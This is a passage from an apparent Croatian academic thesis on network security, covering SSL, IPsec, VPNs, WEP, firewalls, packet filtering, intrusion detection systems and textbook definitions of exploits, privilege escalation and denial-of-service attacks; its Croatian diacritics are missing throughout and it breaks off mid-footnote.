na raun drugih. Takoer, ako se ne bi provjeravalo integritet poruka, napada bi mogao
mijenjati koliine i vrste proizvoda zbog stjecanja koristi, ili iste zabave. Ako se u poslovnoj
komunikaciji ne bi provjeravalo autentinost komunikatora, napada bi mogao napraviti web
sjedite koje izgleda i predstavlja se kao neko (poznato) web sjedite preko kojeg se izvodi etrgovina uz plaanje sa kreditnim karticama. Tada bi napada preko takve web stranice primao
narudbe sa podacima o kreditnim karticama naruitelja; narudbe ne bi izvravao, ali bi uzimao
novac sa bankovnog rauna naruitelja (prema Radovan, 2011:38).
Zadatak meusloja SSL je dakle nadopuna osnovnog TCP protokol sa sustavom koji titi
povjerljivost sadraja (ifriranjem), autentinost komunikatora i integritet poruka.

Slika 16: Poloaj SSL meusloja

57

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
4.2.3.3 Sigurnost na mrenoj razini

Sustav sigurnosti i zatite moe se uspostaviti i na mrenoj razini raunalne mree. Tom
temom se ovdje zbog samog opsega nije mogue baviti; valja spomenuti samo neke osnovne
stvari. Protokol koji definira sigurnost i zatitu na mrenoj razini Interneta, naziva se
sigurnosnim protokolom IP razine (eng. IP security protocol), ili krae IPsec. IPsec je
protokol mrene razine koji omoguava uspostavu sigurnosti i zatite na razini prijenosa IP
paketa90. To moe biti prijenos IP paketa od domaina (ili vratiju mree) na rubni usmjeriva
Interneta i obrnuto, te prijenos izmeu usmjerivaa koji tvore unutranjost (prijenosni sustav)
raunalne mree. IPsec definira zatitu povjerljivosti sadraja, utvrivanje autentinosti
komunikatora, i provjeru integriteta sadraja na razini pojedinanih IP paketa koji se prenose
mreom, od vora do vora, od izvora do konanog odredita91.
Ovo se odnosi na mjere sigurnosti unutar mree, dok njeni rubni ureaji (popularno
nazvani rubovi mree), kao to su routeri, firewall ili ostali posluitelji koji su mostovi prema
internetu predstavljaju ulaznu toku napadaa izvan organizacije. Openito se oni tite:

Grupiranjem rubnih servisa:

90

http://en.wikipedia.org/wiki/IPsec. 04.03.2014, (preuzeto 15.03.2014.).

91

Radovan, M., op. cit., str. 45.

58

Web Servera;
NNTP servera;
VPN servera;
SMTP servera.
-

Razliitim firewallima:
Paket filterima;
Pravilima preusmjeravanja;
Inspekcijom paketa;
ISA;
Aplikacijskim Gatewayima.

Osiguranjem autentikacije.

Implementacijom revizijskih servisa.

Sustavim IDS i IPS:


Analiziranjem prometa;
Automatskim reagiranjem92.
O nekim navedenim mjerama zatite biti e govora nie.
Spomenuto je ve da se sustavi sigurnosti i zatite uspostavljaju uglavnom na viim

razinama mree, iz navedenih razloga. Meutim, postoje mree i situacije kod kojih postoje
uvjeti i razlozi da se sigurnost i zatita provode na mrenoj razini; meu takve mree spadaju
virtualne privatne mree (eng. virtual private networks VPN's). Tako se nazivaju mree koje
koriste usluge prijenosa javne mree Internet, ali tvore potencijalno zatvorene sustave, koji
mogu sprijeiti druge (vanjske) subjekte da pristupaju njihovim vorovima, podmreama i
sadrajima. Virtualne privatne mree nastaju povezivanjem vie meusobno udaljenih mrea
pomou posebnih vratiju koja izvode dvostruka pakiranja IP paketa93.
Osnovni koncept VPN tehnologije jest pojam tuneliranja. Tuneliranje je tehnika kojom se
podaci namijenjeni jednoj mrei prenose preko druge mree. Takva komunikacija obino se
uspostavlja izmeu dva gatewaya ili udaljenog klijenta i gatewaya. Protokol koji slui za
tuneliranje na jednoj strani enkapsulira originalne podatke (ili paket) i dodaje posebno zaglavlje
92

prema Sever, D. Osnove sigurnosti Microsoft mrenih sustava. Zagreb. Sveuilini raunski centar
(SRCE). http://sistemac.srce.unizg.hr/fileadmin/user_root/seminari/Srce-Sys-SeminariOsnove_sigurnosti_MS_mreznih_sustava.pdf. (preuzeto 07.04.2014.).
93

Radovan, M., op. cit., str. 45.

59

prikladno za prijenos preko odgovarajue mrene infrastrukture ili medija, da bi se na drugoj


ponovno

oblikovao

originalan

paket

isporuio

na

odredite.

Osim tuneliranja, VPN rjeenje mora takoer osigurati tajnost i integritet (a nekad i
neporecivost) podataka. Ti zahtjevi ostvaruju se koritenjem kriptografskih metoda i tehnika kao
to su ifriranje, jednosmjerne funkcije i digitalni potpisi. VPN sustavi takoer moraju osigurati
sigurnu

autentikaciju

korisnika

te

biljeenje

praenje

(engl.

logging).

Obzirom na mogunost primjene, VPN sustavi se openito mogu podijeliti na site-to-site sustave
i sustave s udaljenim pristupom94.
Virtualne privatne mree pruaju dobru mogunost da se sustav sigurnosti i zatite
uspostavi na mrenoj razini. Vrata izvode dvostruko pakiranje IP paketa zato da razdvoje (uine
razliitima) pakete iz svoje virtualne mree od paketa iz vanjske (javne) mree. Dvostruko
pakiranje ne titi IP pakete od raznih vrsta napada, ali vrata koja izvode dvostruko pakiranje su
pogodno mjesto na kojem se mogu provoditi mjere sigurnosti i zatite koje smo opisali iznad, i to
na razini IP paketa. Dakle, vrata pomou kojih se ostvaruje virtualna privatna mrea dvostrukim
pakiranjem IP paketa, mogu isto tako izvoditi operacije ifriranja i izraunavanja MAC - ova, i
na taj nain ostvariti zatitu povjerljivosti sadraja, autentinosti poiljatelja i primatelja, i
integriteta poruka na razini pojedinanih IP paketa. Prikladnom obradom IP paketa na vratima,
uz pomo enkripcijskih metoda i sustava, moe se uspostaviti zatita povjerljivosti, autentinosti
i integriteta na razini IP paketa, odnosno na mrenoj razini raunalne mree (prema Radovan,
2011:45).
Dakle, sustav sigurnosti i zatite moe se uspostaviti na mrenoj razini; virtualne privatne
mree naveli smo kao primjer jedne vrste mrea kod kojih postoje pogodni uvjeti da se takav
sustav uspostavi. Protokol IPsec koji definira sustav sigurnosti i zatite na mrenoj razini, je
opsean i sloen. Opis tog protokola dan je u desetak RFCa, od kojih su najvaniji RFC 4301 i
RFC 241195. Prikaz protokola IPsec daleko nadmauje okvire ovog rada.
4.2.3.4 Sigurnost na niim razinama

Sustav sigurnosti i zatite moe se uspostaviti i na razini veze podataka. Uspostava


takvog sustava na razini veze podataka posebno je potrebna kod beinih mrea, kod kojih se
94

egudovi, H. (2004). Sto sigurnosnih lokota. BUG Online. http://www.bug.hr/mreza/tekst/opis-vpntehnologija/54984.aspx. (preuzeto 07.04.2014.).
95

RFC (eng. Request for Comments) je dokument izdan od strane Internet Engineering Task Force
(IETF). Dokumenti obino opisuju metode, ponaanja, istraivanja, ili inovacije primjenjive na Internet i
povezana raunala., http://hr.wikipedia.org/wiki/RFC. (preuzeto 07.04.2014.).

60

prijenos okvira (na razini veze podataka) izvodi pomou radijskih valova koji se openito ire
na sve strane, tako da ih mogu primati i oni kojima nisu namijenjeni sadraji koje ti valovi
prenose, kao to je to sluaj kod beinih mrea definiranih je IEEE standardom 802.11 96. Uz taj
standard definiran je sigurnosni sustav (protokol) koji se naziva Wired Equivalent Privacy
(WEP); tim nazivom htjelo se rei da taj sustav (WEP) prua sigurnost i zatitu ija je kvaliteta
jednaka onoj koju drugi sustavi ostvaruju u raunalnim mreama sa ianim vezama. Osnovni
protokol WEP osigurava (titi) beinu komunikaciju izmeu domaina i toke pristupa (eng.
access point - AP). WEP definira proces ifriranja i utvrivanja autentinosti komunikatora uz
upotrebu simetrinog kljua (prema Radovan, 2011:46).
Iako sustav sigurnosti i zatite u beinim mreama ima svoje posebnosti,
zasnovan je na priblino istim naelima kao i sustavi zatite u mreama sa ianim vezama
dijele zajednike ciljeve a to su: zatita povjerljivosti sadraja, utvrivanje autentinosti
komunikatora, i provjera integriteta poruka. Potpuniji prikaz sigurnosnih protokola i sustava na
razini veze podataka posve prelazi okvire ovog rada.
4.3 Vatrozidi i filteri

U ovom odjeljku govorimo o jednom drugom nainu uspostavljanja sustava zatite u


raunalnoj mrei, koji se zasniva na ograniavanju pristupa pojedinim mreama i na
ograniavanju prijenosa pojedinih vrsta sadraja u pojedine mree i iz tih mrea. Za uspostavu
ove vrste zatite koriste se razna sredstva, meu koje spadaju vatreni zidovi (eng. firewalls),
sustavi za otkrivanje upada (eng. intrusion detection systems - IDSs) i sustavi za sprjeavanje
upada (eng. intrusion prevention systems - IPSs). U nastavku iznosimo prikaze tih sustava koji
tite raunalnu mreu na taj nain da sprjeavaju ulazak nekih jedinica podataka u danu mreu i
izlazak nekih jedinica podataka iz dane mree, kao i kretanje sumnjivih sadraja mreom koju
tite (Radovan, 2011).
4.3.1 Vatrozidi

U svijetu raunala, vatrozid (eng. firewall) je ureaj kojim titimo privatni dio mree od
javnog dijela. Primarna mu je funkcija omoguivanje kontroliranog pristupa iz privatnog,
unutranjeg dijela mree na javni, vanjski dio mree (npr. Internet) i obratno. Na vatrozid se
moe gledati kao na skup veoma razliitih mehanizama koji se mogu podijeliti na dva osnovna
96

Vidi infra, fusnota 192.

61

principa; jedan koji slui sprjeavanju prometa paketa u mrei i drugi koji slui omoguavanju
prometa u mrei. Napredni vatrozidi osiguravaju spajanje unutranje i vanjske mree na svim
programskim slojevima, od podatkovnog sve do aplikacijskog. Vatrozidi se postavljaju na
granici mree te omoguuju pristup drugim mreama. Ovaj koncept je bitan jer bez njega bi
svako raunalo na mrei trebalo obavljati iste funkcije kao i vatrozidi, troei na taj nain vlastite
resurse. Koritenjem vatrozida omoguena je centralizacija svih sigurnosnih servisa na jednom
ureaju optimiziranom za izvravanje tih zadataka. Vatrozidi stvaraju uska grla (eng.
bottlenecks) izmeu unutarnjih i vanjskih mrea jer cijeli promet meu mreama prolazi kroz
jednu kontrolnu toku. Pored toga, ovo je mala cijena za postizanje sigurnosti. Takoer, dok je
brzina vanjske veze relativno mala u odnosu na brzinu dananjih raunala, kanjenje
prouzroeno vatrozidom moe biti zanemareno97.
Slika 17: Poloaj i uloga vatrozida

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
Da bi vatrozid obavljao dobro svoj posao potrebno je dobro postaviti vrijednosti u
tablicama (listama) vatrozida, koje zapisuju pravila koja odreuju nain rada danog vatrozida.
Pravila na vatrozidu trebaju biti oblikovana na nain da taj vatrozid proputa ili odbacuje
odreene zahtjeve za uspostavu veze koji dolaze iz vanjske mree i upueni su nekim
domainima iz mree koju taj vatrozid titi. Ta pravila trebaju isto tako proputati ili odbacivati
zahtjeve za uspostavu veza koji dolaze sa domaina iz mree koju vatrozid titi, a upueni se na
adrese izvan te mree. Dakle, vatreni zid doputa ili sprjeava uspostavljanje odreenih veza i
97

Kra, A., Svilii, B. (2005). Zatita privatnosti raunalnog sustava. Pomorstvo, god. 19. (2005), str.
275-284. http://hrcak.srce.hr/file/6510. (preuzeto 07.04.2014.).

62

odreene tokove podataka na temelju uputstava (pravila) koja su zapisana u njegovim tablicama;
ta uputstva oblikuje i upisuje u tablicu vatrozida mreni administrator (Radovan, 2011).
Za rad vatrozidova karakteristine su tri osnovne stvari98:
(1) Sav promet iz vanjske mree u tienu mreu, i iz tiene mree u vanjsku mreu,
treba prolaziti preko vatrozida. tiene mree mogu biti razliitih veliina; velike mree mogu
biti vezane na vanjsku mreu preko vie vratiju (na vie mjesta) i koristiti razne vrste
vatrozidova. Da bi zatita mree mogla biti uspjena, potrebno je da sav promet u tu mreu i iz
nje prolazi preko barem jednog od vatrozidova koji je tite.
(2) Administrator mree treba postaviti na vatrozidu pravila koja odreuju adrese, vrste
prijenosa i vrste sadraja onih tokova podataka koji smiju ui u tienu mreu, i adrese, vrste
prijenosa i vrste sadraja onih tokova podataka koji smiju izai iz tiene mree. Vatrozid treba
sprjeavati sve druge tokove podataka u tienu mreu i iz nje.
(3) Vatrozid treba biti dobro zatien od svih vrsta napada. Vatrozid je element mree,
tako da je ispostavljen svim vrstama mrenih napada. Da bi mogao uspjeno tititi onu mreu na
ijem ulazu se nalazi, vatrozid treba najprije zatititi sebe od vanjskih napada, koji mogu
poremetiti njegov rad i tako ga uiniti beskorisnim, ili ak tetnim.
Prvi vatrozidi su bili samo paketni filteri. Oni usporeuju pakete mrenih (npr. IP
protokol) i transportnih protokola (npr. TCP protokol) s pravilima zapisanih bazom pravila te
prosljeuju samo one pakete koji se poklapaju s kriterijima specificiranim u bazi pravila. Dakle,
paketni filteri su ureaji koji odbacuju neeljene pakete s obzirom na izvorinu adresu,
odredinu adresu ili vrstu podataka specificiranu brojem TCP porta. Filteri mogu biti
implementirani unutar usmjerivaa ili u TCP/IP stackovima servera. Sljedeom slikom prikazan
je princip rada paketnog filtriranja. Prema pravilima definiranim na vatrozidu, dozvoljen je
prolaz samo TCP paketima na portovima 80 (web),
25 (email) i 21 (FTP), dok je promet na svim ostalim portovima zabranjen. Na primjer,
udaljenom korisniku nije dozvoljen pristup unutranjoj mrei koritenjem NetBIOS
protokola99.
Naela prema kojima vatrozidovi izvode filtriranje paketa oblikuju se na temelju
slijedeih atributa IP paketa100:
98

Radovan, M., op. cit., str. 48.

99

Kra, A., Svilii, B. (2005). Zatita privatnosti raunalnog sustava. Pomorstvo, god. 19. (2005), str.
275-284. http://hrcak.srce.hr/file/6510. (preuzeto 07.04.2014.).
100

Radovan, M., op. cit., str. 48 49.

63

- IP adresa izvora ili odredita - Nepoeljna adresa izvora ili odredita IP paketa je esto
vrlo pogodan element za oblikovanje pravila prema kojem vatrozid proputa ili odbacuje pakete;
- Sadraj polja Protokol u zaglavlju IP paketa - Sadraj tog polja je neki od brojeva koji
oznaavaju protokole kao to su TCP, UDP, ICMP, OSPF, i drugi; filtar moe odbacivati pakete
koji prenose segmente nekih protokola, zato to vlasnik mree ne doputa komunikacije (ni
uspostave veza) u kojima se koriste neki protokoli;
- Ulazni i izlazni port u zaglavlju segmenta kojeg prenosi IP paket - Kod uspostavljanja
veze sa nekim serverom, segment koji sadri zahtjev za uspostavu veze sa tim serverom ima u
zaglavlju zapisan dobro poznati port toga servera. Taj port obino pokazuje koja aplikacija hoe
uspostaviti tu vezu; vatrozidom se moe zabraniti nekim aplikacijama da pristupaju tienoj
mrei, ili nekim dijelovima te mree;
- Stanje bitovnih oznaka u zaglavlju TCP segmenta - Te oznake su SYN, ACK, i druge;
na temelju stanja tih bitovnih oznaka, vatrozid moe sprijeiti uspostavu neke TCP veze;
- Tip ICMP poruke - IP protokol ne ispravlja greke koje nastaju u prijenosu IP paketa.
Ali uz IP protokol, na mrenoj razini Interneta radi ICMP protokol (Internet Control Message
Protocol) koji evidentira gubitke IP paketa u prijenosu i alje obavijesti izvorima (domainima)
iji su paketi izgubljeni (odbaeni, iskrivljeni) na putu. Bez obzira na takve obavijesti, IP
protokol ne ispravlja greke u prijenosu (nego to radi TCP protokol). Meutim, poruke ICMP
protokola mogu se upotrijebiti za neke vrste napada; zato vatrozid moe (treba) filtrirati poruke
te vrste, na neki zadani nain.

Slika 18: Neki primjerki postavki vatrozida

64

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka

Postoji velik broj stavova (naela) koje se na mrei moe podeavati i koje mreni
administrator treba izraziti pomou postavki (pravila rada) na vatrozidu, u svrhu provedbe
zadanih stavova.
Pomou vatrozida mogu se ograniiti (ili onemoguiti) vanjska ispitivanja unutarnje
strukture mree i stanja pojedinih vorova te mree; takva ispitivanja izvode se "pinganjem" 101 i
na druge naine. Sprjeavanjem ispitivanja strukture tiene mree i stanja aplikacija na njenim
domainima od strane vanjskih subjekata, nastoji se oteati uinkovit izvanjski napad na
pojedine vorove i servere tiene mree.
Filtriranje prometa na vatrozidu esto se zasniva na kombinaciji IP adrese i
porta. IP adresa odreuje domaina, a port odreuje vrstu aktivnosti i aplikaciju.
Bitovne oznake u zaglavlju segmenata (koji se prenose u IP paketima) su isto
pogodne za filtriranje. Naprimjer, na temelju vrijednosti bita ACK102 u zaglavlju segmenta,
vatrozid moe dopustiti uspostavu TCP veze sa nekim serverom, ili sprijeiti uspostavu neke
TCP veze. Kod uspostavljanja TCP veze, u prvom segmentu (sa kojim klijent trai uspostavu
veze) vrijednost bita ACK je "0"; sa tim segmentom nema se to potvrditi (ACK) jer je to prvi
segment, sa kojim zapoinje proces uspostavljanja veze. U svim ostalim segmentima, vrijednost
101

Ping je mreni administracijski utility koji se koristi za testiranje raspoloivosti neke mrene aktivne
komponente unutar mree, te za mjerenje vremena njenog odziva, http://en.wikipedia.org/wiki/Ping_
%28networking_utility%29. 26.02.2014, (preuzeto 17.03.2014.).
102

Prvi bit 32 bitne acknowledgment number vrijednosti TCP zaglavlja (eng. header),
http://en.wikipedia.org/wiki/Transmission_Control_Protocol. 07.03.2014, (preuzeto 17.03.2014.).

65

bita ACK je "1" jer se sa njima ujedno potvruje primitak nekog segmenta. Ako se na vatrozidu
postavi pravilo da odbacuje IP pakete koji dolaze izvana i nose TCP segment u kojem je ACK
jednako "0", onda nijedan vanjski klijent nee moi uspostaviti TCP vezu ni sa jednim
serverom u tienoj mrei. Nadalje, ako se postavkama na vatrozidu dopusti klijentima iz tiene
mree da alju TCP segmente sa ACK jednako "0" u vanjsku mreu, onda se time doputa da
unutarnji klijenti alju zahtjeve za uspostavu TCP veze vanjskim serverima. Uspostavi takve
veze slijediti e nesmetana komunikacija; vanjski serveri moi e slati unutarnjim klijentima
traene podatke, jer vatrozid odbacuje samo one vanjske segmente kod kojih je ACK jednako
"0", a odgovori servera imaju uvijek ACK vrijednost "1"103.
Ovdje opisana pravila filtriranja, zadaju se vatrozidu pomou tablica koje se
nazivaju listama upravljanja pristupom (eng. access control lists). Svaki redak takve liste
(tablice) sadri precizan zapis jednog pravila, poput onih o kojima smo govorili iznad. Na slici
19. dan je ilustrativni primjer takve tablice.

Slika 19: Tablica upravljanja pristupom

Izvor: Radovan, M., (2011.) Raunalne mree (2). Digital point tiskara, Rijeka
Postoje preporuke u svezi pravila za pojedine protokole i portove ime se sprjeavaju
neke poznate vrste (izvanjskih) napada kojima su podloni ti protokoli i usluge.
4.3.2 Filtri

Vatrozid moe izvoditi filtriranje i na temelju drugih parametara (stanja i vrijednosti). S


obzirom na to koje sve parametre uzimaju u obzir kod filtriranja, vatrozidove se dijeli na tri

103

Radovan, M., op. cit., str. 50.

66

osnovne vrste: (1) tradicionalni filtri paketa, (2) filtri paketa prema stanjima, i (3) vrata
aplikacija104.
Tradicionalni filtri paketa (traditional packet filters) - Filtri ove vrste promatraju svaki
IP paket zasebno. Na temelju pravila sa liste upravljanja pristupom, vatrozid za svaki paket
odluuje da li da ga propusti (prema njegovom odreditu), ili da ga odbaci i time sprijei u
daljnjem kretanju prema njegovom odreditu. Vatrozid procesira svaki IP paket zasebno,
nezavisno od drugih paketa, i bez uvida u druge pokazatelje stanja komunikacije (Radovan,
2011:52).
Filtri paketa prema stanjima (stateful packet filters) - Vatrozid ove vrste dodaje jednu
dimenziju procesu tradicionalnog filtriranja paketa, kojeg smo opisali iznad. Ova vrsta vatrozida
odrava i konzultira tablicu TCP veza koje se uspostavljaju i odvijaju preko njega. Nazivom te
vrste vatrozida htjelo se istaknuti upravo to, da pored liste upravljanja pristupom (koju smo
opisali iznad), vatrozid ovdje promatra i stanje TCP veza. Engleski izraz "stateful" kae
otprilike isto, ali na krai i manje jasan nain (Radovan, 2011:52).

Vrata aplikacija (eng. application gateways) - Vatrozid koji izvodi filtriranje prema
sadrajima iz zaglavlja IP paketa i TCP segmenata tvori osnovnu razinu filtriranja. Vatrozid koji
dopunjava takvo filtriranje uvidom u stanje TCP veza, podie kvalitetu filtriranja (i zatite
mree) na viu razinu. Vatrozid kojeg se naziva vratima aplikacije, omoguava da se proces
filtriranja definira jo preciznije, a time i kvalitetnije. Vatrozid te vrste nadzire i ograniava
prijenos sadraja u tienu mreu i iz nje na razini pojedinanih aplikacija i pojedinanih
korisnika. Naprimjer, vatrozid tipa vrata aplikacije moe doputati koritenje usluge Telnet
preko granice tiene mree samo odreenim osobama iz te mree (Radovan, 2011).
Prednosti koritenja paketnog filtriranja su sljedee:
-

jedan ureaj titi cijelu mreu - jedna od najvanijih znaajki paketnog filtriranja je u
tome to jedan strateki dobro konfiguriran usmjeriva za filtriranje paketa titi cijelu
mreu. Ukoliko se lokalna mrea spaja na Internet preko samo jednog usmjerivaa,
postavljajui na njemu sustav paketnog filtriranja, znatno se poveava sigurnost mree.

velika efikasnost - jednostavno filtriranje paketa je vrlo efikasno. Budui da filtriranje


paketa zahtjeva pregledavanje samo nekoliko zaglavlja paketa, cijeli proces se odvija s
vrlo malim zakanjenjem;

104

ibid. 52 53.

67

iroka dostupnost - produkti za implementaciju paketnog filtriranja su iroko dostupni u


mnogobrojnim hardverskim i softverskim proizvodima, komercijalnim ili besplatnim.
Mnogi komercijalni routerski produkti standardno ukljuuju mogunost

paketnog

filtriranja (Kra, Svilii, 2005:277).

Nedostaci koritenja paketnog filtriranja su sljedei:


-

alati za filtriranje nisu savreni - pored toga to su alati za paketno filtriranje


iroko rasprostranjeni i dostupni u razliitim hardverskim i softverskim proizvodima,
paketno filtriranje jo uvijek nije savreno. Postoje ogranienja pri razvoju I
implementaciji alata za filtriranje, kao to su: zahtjevno konfiguriranje pravila za
filtriranje, jednom konfigurirana pravila teko je testirati, propusti i neispravnosti alata za
filtriranje itd.

nemogunost implementacije neke od zabrana - neke od eljenih pravila kontrole


mrenog prometa nije mogue implementirati. Na primjer, paketi koji se provjeravaju
paketnim filtriranjem sadre informacije kojem raunalu su namijenjeni, ali ne i kojem
korisniku. Dakle, zabrane na nivou korisnika nisu mogue. Slina je i situacija kada
paketi nose informaciju na koji se port prenose, ali ne i koja je aplikacija u pitanju. Prema
tome, zabrane na viem nivou protokola vre se preko brojeva portova, nadajui se
da se nita drugo ne izvrava na tom portu (Kra, Svilii, 2005:278).

4.3.3 Sustavi za otkrivanje upada

Otkrivanje upada je skup tehnika i metoda koje se koriste za otkrivanje sumnjivih


aktivnosti na mrei, odnosno otkrivanje neeljenog mrenog prometa. Sustav za otkrivanje
upada moe biti implementiran

programski, sklopovski ili kao kombinacija sklopovlja i

programa. On nadgleda promet u mrei kako bi mogao otkriti neeljene aktivnosti i dogaaje
kao to su ilegalni, zlonamjerni promet te promet koji naruava sigurnosnu politiku.
Mnogi IDS alati zapisuju otkrivanje takvog dogaaja u bazu podataka kako bi se kasnije mogli
pregledati ili kako bi kombinirali ovaj dogaaj s drugim podacima. Na temelju vlastite izgraene
baze podataka o napadima mogu se donositi odluke o politici sustava ili o provjeri tete. Glavni
cilj otkrivanja upada je nadgledati mreu kako bi se mogle otkriti nepravilnosti u ponaanju i

68

zlouporaba. Ovaj koncept postoji skoro dvadeset godina, ali je tek nedavno doivio dramatian
rast popularnosti i konstruiranja u ukupnoj infrastrukturi informacijske sigurnosti105.

IDS sustavi se mogu podijeliti na:

Mreni IDS NIDS (eng. Network Intrusion Detection System) - moe analizirati
mreni promet i usporediti ga s datotekom u kojoj se nalazi baza potpisa napada. Mreni
IDS koristi mrene prikljunice koje su postavljenje u tzv. promiscue modu rada (primaju
sve mrene pakete, ne samo one adresirane za to raunalo/ureaj) kako bi mogao
uhvatiti pakete koji su namijenjeni drugim ureajima u mrei. Zadatak ovog
sustava je stvarati upozorenja ako doe do napada (i to se mora napraviti u
stvarnom vremenu) te stvarati zapise za pomo kod analize napada nakon to se
napad ve dogodio.

Ureaj u raunalnoj mrei s IDS-om HIDS (eng. Host Based Intrusion Detection
System) nalazi se instaliran na ureajima u raunalnoj mrei. Njegovi zadaci su
analizirati zapise sustava i aplikacija koji se nalaze u datotekama te prepoznati
netipine aktivnosti koje bi mogle biti oznaavati upad. On prati promet koji ulazi u
mreu na jednom raunalu kako bi mogao detektirati upade i pri tome koristi otkrivanje
upada koje je bazirano na nepravilnostima ili potpisima. Ako sprimijeti neobino
ponaanje na mrei, HIDS analizira zapise sustava. Primjer ovakvog neobinog
dogaaja je pokuaj viestrukog nepravilnog prijavljivanja u neki sustav. Provjeravaju se
i datoteke u sustavu tako da se prati je li bilo promjena u njima i jesu li stvorene ili
izbrisane106.

Distribuirani sustav za otkrivanje upada DIDS (eng. Distribuited Intrusion


Detection System) sastoji se od sustava NIDS, HIDS ili oba. DIDS se sastoji od senzora
smjetenih po cijeloj mrei koji alju izvjetaje u sredinju upravljaku jedinicu te
sredinje upravljake jedinice koja sadri bazu potpisa. Ako za to doe potreba, ti

105

CIS FER, (2011). SnortIDS. CIS-DOC-2011-10-028, http://www.cis.hr/files/dokumenti/CIS-DOC2011-10-028.pdf - (preuzeto 07.04.2014.)., str. 5.


106

ibid. 7-8.

69

se potpisi alju do odreenog Snort IDS senzora kako bi on mogao provesti odreenu
akciju. Izmeu sredinje upravljake jedinice i senzora koristi se kriptirana VPN veza107.

Sustav tipa IDS moe otkrivati razliite vrste izvanjskih napada na mreu koju tite u
vidu njenih strukturnihe elemenata, sadraja i aktivnosti. Mnogi proizvoai softvera proizvode i
prodaju takve sustave. Meu najpoznatije proizvoae takvih sustava spadaju tvrtke Cisco i
Check Point a postoje i sustavi tipa IDS koji su javno dostupni na mrei. Jedan takav sustav koji
se nalazi u irokoj upotrebi, naziva se Snort108.

5. ISKORITAVANJE RANJIVOSTI SUSTAVA RAUNALNE


KOMUNIKACIJE
Ranjivost sustava raunalne komunikacije predstavlja ukupnost postojeeg rizika
utvrenog evaluacijskim postupcima (potpoglavlje 3.2). Toke koje predstavljaju sigurnosne
rizike odnosno ranjivost mrenog sustava predmet su napada od strane napadaa, sa ciljem
plasiranja odreenog exploita109.
107

ibid. 8-9.

108

Sustav otvorenog koda za prevenciju i detekciju intruzije na raunalnim mreama, razvijen od tvrtke
Sourcefire, http://www.snort.org/. (preuzeto 17.03.2014.).
109

Napad koritenjem ranjivosti operativnog sustava i/ili instaliranih aplikacija na raunalu,


http://www.nod32.com.hr/tabid/2556/Default.aspx. (preuzeto 17.03.2014.).

70

U okviru raunalne sigurnosti exploit predstavlja skup informacija koji napada upuuje
npr. web posluitelju kojega eli napasti, iskoritavajui (eng. to exploit) njegove nedostatke,
odnosno ranjivosti. To moe biti dio softvera, blok podataka ili slijed naredbi koje iskoritavaju
programske ili sklopovske pogreke, nepravilnosti u radu i sline ranjivosti sustava s namjerom
da prouzrokuju nenamjeravano ili neoekivano ponaanje na programskoj opremi raunala,
sklopovlju ili neem drugom elektronikom (uglavnom raunalnom). Ovo esto ukljuuje
dobivanje kontrole nad raunalnim sustavom i omoguavanje napada poput eskalacije ovlasti ili
uskraivanja posluivanja110.
Eskalacija ovlasti111 (eng. privilege escalation) je postupak iskoritavanja pogreka u
programu u svrhu dobivanja pristupa sredstvima koja bi inae bila zatiena. Posljedica ovog je
da program moe obavljati radnje sa veom sigurnosnom razinom nego to mu je prvotno
namjenjeno od strane razvojnog programera ili administratora sustava.
Uskraivanje posluivanja112 (eng. Denial-of-Service, DoS attack) odnosi se na napad
koji kao posljedicu ima odbijanje usluga, tj. to je vrsta mrenog napada pri kojem se mrea
onesposobljuje time to ju se optereuje izuzetno velikim, ali beskorisnim prometom pa nije u
mogunosti odgovarati na sve zahtjeve, odnosno pruati traene usluge. Mnogi DoS napadi
eksploatiraju ogranienja TCP/IP-a (eng. Transmission Control Protocol), a esto su usmjereni
na neke tono odreene posluitelje koje nastoje preopteretiti i izbaciti iz funkcije. Za poznate
vrste napada ovog tipa postoje softverska rjeenja koja smanjuju mogunost i intenzitet napada,
no hakeri stalno pronalaze nove vrste napada. Ovi napadi mogu natjerati raunalo (ili raunala)
rtve napada da se ponovo pokrene (resetira), da zauzme sve svoje resurse tako da vie ne moe
pruati usluge za koje je namjenjen ili mogu prouzroiti smetnje u komunikacijskom kanalu

110

http://en.wikipedia.org/wiki/Exploit_%28computer_security%29. 08.03.2014., (preuzeto 17.03.2014.).

111

http://en.wikipedia.org/wiki/Privilege_escalation. 08.03.2014., (preuzeto 17.03.2014.).

112

Denial-of-service attack. http://en.wikipedia.org/wiki/Denial-of-service_attack. 15.03.2014., (preuzeto


17.03.2014.).

71

izmeu korisnika i rtve napada s namjerom da se onemogui primjerena komunikacija. Poznati


primjeri DoS napada su Ping of Death113 i Teardrop114 attack115.
Postoje takoer i exploiti protiv klijentskih programa, koji se obino sastoje od
izmijenjenih web posluitelja koji alju exploit ako im se pristupi s predmetnim klijentskim
programom. Takvi exploiti esto zahtjevaju izvjestan stupanj interakcije sa korisnikom pa se
redovito kombiniraju sa metodom tzv. socijalnog ininjeringa (eng. Social engineering).
Socijalni ininjering ukljuuje metode ugroavanja sigurnosti informacijskih sustava bez
primjene visoke tehnologije. Koncentrira se na manipuliranje ljudima unutar sustava kako bi se
od njih pribavile povjerljive informacije potrebne za neovlateno koritenje resursa
informacijskog sustava. Tako se tu ubrajaju razne obmane, lano predstavljanje, kraa identiteta,
slanje lanih poruka elektronikom potom i ostale vrste netehnolokih manipulacija.
Mnogi exploiti su dizajnirani tako, da se njihovom upotrebom, postigne superkorisnika
razina pristupa na raunalnom sustavu. Meutim, takoer je mogue koristiti i nekoliko exploita
odjednom: prvi da bi se dobila niska razina pristupa, a zatim uporaba svakog sljedeeg exploita
poveava razinu pristupa dok se ne dostigne superkorisnika razina pristupa.
Superkorisnik (eng. superuser) je korisnik sa svim moguim pravima ili dozvolama za
koritenje raunalnog sustava u svim moguim modalitetima i situacijama, a naziva se jo i

113

Jedan tip napada popunjavanja meuspremnika iskoritava manu u implementaciji ICMP-a. Napada
ne mora znati nita o raunalu koje napada, osim njegove IP adrese. Ovaj napad ukljuuje slanje
zlonamjerne ping poruke raunalu. U normalnom sluaju ping je velik 64 bajta. Mnogi sustavi ne mogu
obraditi ping zahtjev koji je vei od maksimalne veliine IP paketa. Slanje ping paketa te veliine nije
dozvoljeno u mrenim protokolima, ali je mogue poslati fragmentiram paket te veliine. Kada raunalo
primi takav paket i ponovno ga sloi moe doi do popunjavanja meuspremnika, to esto rezultira
padom sustava.
114

Ovaj tip DoS napada iskoritava nain na koji IP protokol (engl . Internet Protocol), paket koji je
preveliki za router dijeli na fragmente. U fragmente paketa upisuje se udaljenost od poetka prvog
